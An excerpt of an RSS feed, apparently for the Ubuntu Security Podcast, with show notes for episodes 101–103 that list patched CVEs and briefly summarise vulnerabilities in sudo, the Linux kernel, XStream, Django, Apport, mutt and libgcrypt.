<li><a href="https://ubuntu.com/security/CVE-2020-27821">CVE-2020-27821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15859">CVE-2020-15859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11947">CVE-2020-11947</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual sorts of issues in device emulation etc resulting in info
disclosure from host to guest or a crash of qemu host process etc</li>
</ul>
<h3 id="usn-4717-2-firefox-regression-03-55">[<a href="https://ubuntu.com/security/notices/USN-4717-2">USN-4717-2</a>] Firefox regression [03:55]</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)</li>
<li>Upstream Firefox regression - 85.0.1</li>
</ul>
<h3 id="usn-4726-1-openjdk-vulnerability-04-04">[<a href="https://ubuntu.com/security/notices/USN-4726-1">USN-4726-1</a>] OpenJDK vulnerability [04:04]</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)</li>
<li>Not much info from upstream on this one - &ldquo;incorrectly handled direct
buffering of characters&rdquo; -&gt; DoS or other unspecified impact</li>
</ul>
<h3 id="usn-4713-2-linux-kernel-vulnerability-04-22">[<a href="https://ubuntu.com/security/notices/USN-4713-2">USN-4713-2</a>] Linux kernel vulnerability [04:22]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-102/">Episode 102</a> - LIO SCSI XCOPY issue</li>
</ul>
<h3 id="usn-4727-1-linux-kernel-vulnerability-04-36">[<a href="https://ubuntu.com/security/notices/USN-4727-1">USN-4727-1</a>] Linux kernel vulnerability [04:36]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-26708">CVE-2021-26708</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AF_VSOCK race conditions - local user could get code execution as root via memory corruption</li>
</ul>
<h3 id="usn-4728-1-snapd-vulnerability-05-11">[<a href="https://ubuntu.com/security/notices/USN-4728-1">USN-4728-1</a>] snapd vulnerability [05:11]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27352">CVE-2020-27352</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Gilad Reti &amp; Nimrod Stoler from CyberArk</li>
<li>Thanks to Ian Johnson from snapd team for working on the fix</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E103.mp3" length="10686418" type="audio/mpeg" /><itunes:duration>13:14</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 102
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-102/</link>
          <pubDate>Fri, 05 Feb 2021 13:31:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ffb4cd66df50b87f415deaa1a9159cefa012a7dcc211647e7df815377c8b67217fe868f14e5defcb9ff8d15edfb5ba2fb1f655fac0fb93ac44f8a1da9b5bad5a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 102</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we discuss the recent high profile vulnerability found in
  libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream,
  Django, Apport and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we discuss the recent high profile vulnerability found in
  libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream,
  Django, Apport and more.
  </itunes:summary>
        <description>  This week we discuss the recent high profile vulnerability found in
  libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream,
  Django, Apport and more.
  </description>
        <googleplay:description>  This week we discuss the recent high profile vulnerability found in
  libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream,
  Django, Apport and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we discuss the recent high profile vulnerability found in
libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream,
Django, Apport and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>66 unique CVEs addressed</p>
<h3 id="usn-4705-2-sudo-vulnerability-00-48">[<a href="https://ubuntu.com/security/notices/USN-4705-2">USN-4705-2</a>] Sudo vulnerability [00:48]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3156">CVE-2021-3156</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-101/">Episode 101</a></li>
</ul>
<h3 id="usn-4708-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4708-1">USN-4708-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27777">CVE-2020-27777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25669">CVE-2020-25669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19816">CVE-2019-19816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19813">CVE-2019-19813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13093">CVE-2018-13093</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4709-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4709-1">USN-4709-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25669">CVE-2020-25669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19816">CVE-2019-19816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19813">CVE-2019-19813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13093">CVE-2018-13093</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4710-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4710-1">USN-4710-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25704">CVE-2020-25704</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4711-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4711-1">USN-4711-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25704">CVE-2020-25704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4712-1-linux-kernel-regression">[<a href="https://ubuntu.com/security/notices/USN-4712-1">USN-4712-1</a>] Linux kernel regression</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Groovy (20.10)</li>
</ul>
<h3 id="usn-4713-1-linux-kernel-vulnerability-01-31">[<a href="https://ubuntu.com/security/notices/USN-4713-1">USN-4713-1</a>] Linux kernel vulnerability [01:31]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XCOPY requests in the LIO SCSI target would not properly check
permissions of the requester and so could allow an attacker to access
backing stores to which they did not have permission. If using iSCSI,
this could then be exploited over the network to access other LUNs
etc. Also affected tcmu-runner which is the userspace daemon for handling
requests in userspace and can be used for HA setups etc.</li>
</ul>
<h3 id="usn-4707-1-tcmu-vulnerability-02-23">[<a href="https://ubuntu.com/security/notices/USN-4707-1">USN-4707-1</a>] TCMU vulnerability [02:23]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3139">CVE-2021-3139</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Separate CVE was assigned but is the same issue as for the kernel above</li>
</ul>
<h3 id="lsn-0074-1-linux-kernel-vulnerability-02-40">[LSN-0074-1] Linux kernel vulnerability [02:40]</h3>
<ul>
<li>4 CVEs addressed
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25645">CVE-2020-25645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12352">CVE-2020-12352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0427">CVE-2020-0427</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4706-1-ceph-vulnerabilities-02-55">[<a href="https://ubuntu.com/security/notices/USN-4706-1">USN-4706-1</a>] Ceph vulnerabilities [02:55]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25660">CVE-2020-25660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1128">CVE-2018-1128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10753">CVE-2020-10753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10736">CVE-2020-10736</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4714-1-xstream-vulnerabilities-03-02">[<a href="https://ubuntu.com/security/notices/USN-4714-1">USN-4714-1</a>] XStream vulnerabilities [03:02]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26259">CVE-2020-26259</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26258">CVE-2020-26258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26217">CVE-2020-26217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Java library to serialise objects to/from XML</li>
<li>Possible RCE by manipulating the processed input stream to inject shell
commands</li>
<li>Similarly could obtain arbitrary file deletion (depending on the rights
of the process which is using XStream)</li>
</ul>
<h3 id="usn-4715-1-usn-4715-2-django-vulnerability-03-58">[<a href="https://ubuntu.com/security/notices/USN-4715-1">USN-4715-1</a>, <a href="https://ubuntu.com/security/notices/USN-4715-2">USN-4715-2</a>] Django vulnerability [03:58]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3281">CVE-2021-3281</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Directory traversal via archives with absolute paths of relative paths
with dot components - this is used with startapp or startproject via the
&ndash;template argument so can be exploited if using an attacker controlled
archive to bootstrap a new django app etc</li>
</ul>
<h3 id="usn-4716-1-mysql-vulnerabilities-05-00">[<a href="https://ubuntu.com/security/notices/USN-4716-1">USN-4716-1</a>] MySQL vulnerabilities [05:00]</h3>
<ul>
<li>25 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-2122">CVE-2021-2122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2088">CVE-2021-2088</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2087">CVE-2021-2087</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2081">CVE-2021-2081</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2076">CVE-2021-2076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2072">CVE-2021-2072</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2070">CVE-2021-2070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2065">CVE-2021-2065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2061">CVE-2021-2061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2060">CVE-2021-2060</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2058">CVE-2021-2058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2056">CVE-2021-2056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2048">CVE-2021-2048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2046">CVE-2021-2046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2038">CVE-2021-2038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2036">CVE-2021-2036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2032">CVE-2021-2032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2031">CVE-2021-2031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2024">CVE-2021-2024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2022">CVE-2021-2022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2021">CVE-2021-2021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2014">CVE-2021-2014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2011">CVE-2021-2011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2010">CVE-2021-2010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2002">CVE-2021-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream version: 8.0.23 for 20.10/20.04 LTS and 5.7.33 for 16.04
LTS/18.04 LTS</li>
</ul>
<h3 id="usn-4717-1-firefox-vulnerabilities-05-32">[<a href="https://ubuntu.com/security/notices/USN-4717-1">USN-4717-1</a>] Firefox vulnerabilities [05:32]</h3>
<ul>
<li>11 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23965">CVE-2021-23965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23964">CVE-2021-23964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23963">CVE-2021-23963</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23962">CVE-2021-23962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23961">CVE-2021-23961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23960">CVE-2021-23960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23958">CVE-2021-23958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23956">CVE-2021-23956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23955">CVE-2021-23955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23954">CVE-2021-23954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23953">CVE-2021-23953</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream version: 85.0</li>
</ul>
<h3 id="usn-4467-2-qemu-vulnerabilities-05-52">[<a href="https://ubuntu.com/security/notices/USN-4467-2">USN-4467-2</a>] QEMU vulnerabilities [05:52]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14364">CVE-2020-14364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13754">CVE-2020-13754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13659">CVE-2020-13659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13362">CVE-2020-13362</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13361">CVE-2020-13361</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13253">CVE-2020-13253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-88/">Episode 88</a> - subset of these applied for the older release of QEMU in
14.04 ESM, now fixed there</li>
</ul>
<h3 id="usn-4718-1-fastd-vulnerability-06-12">[<a href="https://ubuntu.com/security/notices/USN-4718-1">USN-4718-1</a>] fastd vulnerability [06:12]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27638">CVE-2020-27638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS in popular VPN daemon for embedded systems etc</li>
</ul>
<h3 id="usn-4719-1-ca-certificates-update-06-28">[<a href="https://ubuntu.com/security/notices/USN-4719-1">USN-4719-1</a>] ca-certificates update [06:28]</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)</li>
<li>Updated to the latest 2.46 version of the Mozilla certificate authority
bundle</li>
</ul>
<h3 id="usn-4720-1-apport-vulnerabilities-06-46">[<a href="https://ubuntu.com/security/notices/USN-4720-1">USN-4720-1</a>] Apport vulnerabilities [06:46]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25684">CVE-2021-25684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25683">CVE-2021-25683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25682">CVE-2021-25682</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 vulns all discovered by Itai Greenhut and reported to us via Launchpad</li>
<li>When a process crashes, Apport reads various files under /proc to obtain
info about the crashed process to prepare a crash report</li>
<li>If an attacker could control the values in the files they could then
cause Apport to misbehave and fail to drop privileges or possibly get
code execution - in this case, they found that Apport failed to properly
handle malformed contents in these files - fixed to parse them more
strictly</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="libgcrypt-1-dot-9-dot-0-0-day-08-32">libgcrypt 1.9.0 0-day [08:32]</h3>
<ul>
<li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2145">https://bugs.chromium.org/p/project-zero/issues/detail?id=2145</a></li>
<li>Discovered by Tavis Ormandy from GPZ - heap buffer overflow, allows to
overwrite a structure on the heap which contains the buffer, followed by
a function pointer - so can relatively easily get code execution by
overwriting the function pointer to an attacker controlled function
(which could be in the initial buffer itself)</li>
<li>Ubuntu not affected since this only exists in 1.9.0 which was released on
19th January this year and even current devel release of Ubuntu 21.04
only contains 1.8.7</li>
<li>So is an interesting thought experiment - if you run the most latest
release of anything, you get both the newest patches automatically BUT
you also get the 0-days since any unknown, unpatched vulns introduced in
new code will be present. However, if you run older releases, they won&rsquo;t
have this newer code so won&rsquo;t have 0-days but may have N-days <strong>if</strong> you
aren&rsquo;t patching. Worst case is to run old software and never update it
since it has vulns that are unpatched and which have more time to have
been discovered <strong>and</strong> more time for exploits to have been developed
against it. Whereas if you run the latest code, there is less chance an
exploit exists for any new vulns / 0-days it may contain <strong>but</strong> it clearly
could have 0-days&hellip; Also if you are constantly upgrading to the latest
version that is a lot of churn and introduces the chance for feature
regressions and other breakage etc. So the best option then is to run a
known stable version <strong>and</strong> apply patches on top just for security
vulnerabilities - this is exactly the approach we take for Ubuntu :)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E102.mp3" length="10341702" type="audio/mpeg" /><itunes:duration>12:26</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 101
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-101/</link>
          <pubDate>Thu, 28 Jan 2021 19:42:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a804e169f1bfb0f7382c5fb1a8c8fa9eb343a0c46c0dfdae7c3ae59777124ec767f15d5045ff277e46a64bc95f5694abcc26763f56e66fa3c8da9c38ac5b5581</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 101</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In the first episode for 2021 we bring back Joe McManus to discuss the
  SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics
  drivers and mutt. We also cover some open positions in the team and say
  farewell to...
        
        ]]></itunes:subtitle>
        <itunes:summary>  In the first episode for 2021 we bring back Joe McManus to discuss the
  SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics
  drivers and mutt. We also cover some open positions in the team and say
  farewell to long-time Ubuntu Security superstar Jamie Strandboge.
  </itunes:summary>
        <description>  In the first episode for 2021 we bring back Joe McManus to discuss the
  SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics
  drivers and mutt. We also cover some open positions in the team and say
  farewell to long-time Ubuntu Security superstar Jamie Strandboge.
  </description>
        <googleplay:description>  In the first episode for 2021 we bring back Joe McManus to discuss the
  SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics
  drivers and mutt. We also cover some open positions in the team and say
  farewell to long-time Ubuntu Security superstar Jamie Strandboge.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In the first episode for 2021 we bring back Joe McManus to discuss the
SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics
drivers and mutt. We also cover some open positions in the team and say
farewell to long-time Ubuntu Security superstar Jamie Strandboge.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>22 unique CVEs addressed</p>
<h3 id="usn-4689-3-nvidia-graphics-drivers-vulnerabilities-01-09">[<a href="https://ubuntu.com/security/notices/USN-4689-3">USN-4689-3</a>] NVIDIA graphics drivers vulnerabilities [01:09]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1056">CVE-2021-1056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1053">CVE-2021-1053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1052">CVE-2021-1052</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 different vulns in binary nvidia graphics drivers which could allow
unprivileged users to DoS / info leak or possible priv esc</li>
</ul>
<h3 id="usn-4689-4-linux-kernel-update-01-42">[<a href="https://ubuntu.com/security/notices/USN-4689-4">USN-4689-4</a>] Linux kernel update [01:42]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1056">CVE-2021-1056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1053">CVE-2021-1053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1052">CVE-2021-1052</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Corresponding kernel updates for nvidia dkms driver update</li>
</ul>
<h3 id="usn-4697-2-pillow-vulnerabilities-02-00">[<a href="https://ubuntu.com/security/notices/USN-4697-2">USN-4697-2</a>] Pillow vulnerabilities [02:00]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10177">CVE-2020-10177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35653">CVE-2020-35653</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4702-1-pound-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4702-1">USN-4702-1</a>] Pound vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-21245">CVE-2018-21245</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10711">CVE-2016-10711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4703-1-mutt-vulnerability-02-18">[<a href="https://ubuntu.com/security/notices/USN-4703-1">USN-4703-1</a>] Mutt vulnerability [02:18]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3181">CVE-2021-3181</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory allocation amplification attack -&gt; a &ldquo;small&rdquo; sized email can cause
mutt to allocate a very large amount of memory when processing the email
and cause it to crash as a result of exhausting available memory</li>
<li>If had empty semicolons in an address field, mutt would allocate 40 bytes
for each - so for a 1 byte ; mutt allocates 40 bytes - and so a 25MB
email can cause mutt to allocate 1GB</li>
</ul>
<h3 id="usn-4704-1-libsndfile-vulnerabilities-03-52">[<a href="https://ubuntu.com/security/notices/USN-4704-1">USN-4704-1</a>] libsndfile vulnerabilities [03:52]</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3832">CVE-2019-3832</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19758">CVE-2018-19758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19662">CVE-2018-19662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19661">CVE-2018-19661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19432">CVE-2018-19432</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13139">CVE-2018-13139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6892">CVE-2017-6892</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16942">CVE-2017-16942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14634">CVE-2017-14634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14246">CVE-2017-14246</a> <!-- raw HTML omitted --></li>
